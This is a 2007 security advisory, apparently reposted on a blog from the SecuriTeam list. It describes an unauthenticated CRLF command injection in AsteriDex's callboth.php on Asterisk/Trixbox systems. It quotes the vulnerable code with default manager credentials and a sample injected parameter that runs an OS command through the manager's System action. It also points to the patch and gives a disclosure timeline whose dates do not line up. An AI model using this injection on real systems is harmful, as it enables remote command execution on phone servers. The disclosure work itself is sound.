Search This Blog

Monday, July 09, 2007

[UNIX] AsteriDex Code Execution (Asterisk and Trixbox)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

AsteriDex Code Execution (Asterisk and Trixbox)
------------------------------------------------------------------------


SUMMARY

<http://bestof.nerdvittles.com/applications/asteridex/> AsteriDex is "a
digital rolodex for Asterisk / Trixbox PBXs". There is a command injection
vulnerability which allows unauthenticated users to execute arbitrary
commands on the Asterisk management console. Such access permits execution
of arbitrary operating system commands as the 'asterisk' user.

DETAILS

Vulnerable Systems:
* AsteriDex version 3.0 and prior

The script 'callboth.php' is used by AsteriDex to bridge a VOIP call
between two end-points. Insufficient parameter checking is done on the
variables IN and OUT, allowing a malicious user to inject arbitrary
commands into the Asterisk management console.

The script works by logging into the console server on port 5038/TCP on
localhost. It then issues an 'Action: Originate' command which is used to
setup the bridged call. The relevant code from callboth.php is:

fputs ($fp, "Action: login\r\n");
fputs ($fp, "Username: phpagi\r\n");
fputs ($fp, "Secret: phpagi\r\n");
fputs ($fp, "Events: off\r\n\r\n");
sleep(1) ;
fputs ($fp, "Action: Originate\r\n");
fputs ($fp, "Channel: $IN\r\n"); << Command injection
fputs ($fp, "Context: custom-callboth\r\n");
fputs ($fp, "Exten: $OUT\r\n"); << Command injection
fputs ($fp, "Priority: 1\r\n\r\n");

$IN is set from $_GET['IN'] with no sanity checking other than a test of
string length; all strings passed to $IN must be less than 100 chars,
including the string 'sip/' which is prepended to $IN prior to the length
check.

Given sane values of $IN=123, $out=321 and $CallerID=567, the session
would look like this:

Action: login
Username: phpagi
Secret: phpagi
Events: off

Action: Originate
Channel: 123
Context: custom-callboth
Exten: 321
Priority: 1

By including CRLF characters in $IN, an attacker can inject arbitrary
commands into the data stream, hijacking the authenticated session to run
commands of the attackers choice. Take, for example, a $IN string
containing:
190@example.com\r\nApplication: System\r\nData: echo pwn3d >
/tmp/hoku.txt\r\n

This would transform the session into:
Action: login
Username: phpagi
Secret: phpagi
Events: off

Action: Originate
Channel: 190@example.com
Application: System
Data: echo pwn3d > /tmp/hoku.txt

Context: custom-callboth
Exten: 321
Priority: 1

This would use the call manager's 'System' functionality to execute
user-supplied operating system commands, in this case writing the word
"pwn3d" to a file called "/tmp/hoku.txt". The rest of the session would
fail because the attacker has subverted the original 'Action', rendering
the remaining commands meaningless to the manager.

Solution:
A patched version of AsteriDex is available from:
<http://bestof.nerdvittles.com/applications/asteridex/>

http://bestof.nerdvittles.com/applications/asteridex/

Disclosure Timeline:
06/25/2007 - Vendor contacted.
06/03/2007 - Vendor contacted again, response received. Details sent to
vendor.
06/03/2007 - Patch issued and updated version available.
06/05/2007 - Advisory released.


ADDITIONAL INFORMATION

The information has been provided by <mailto:carl@hoku.co.uk> Carl
Livitt.
The original article can be found at:
<http://www.hoku.co.uk/advisories/asteridex.txt>

http://www.hoku.co.uk/advisories/asteridex.txt

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments: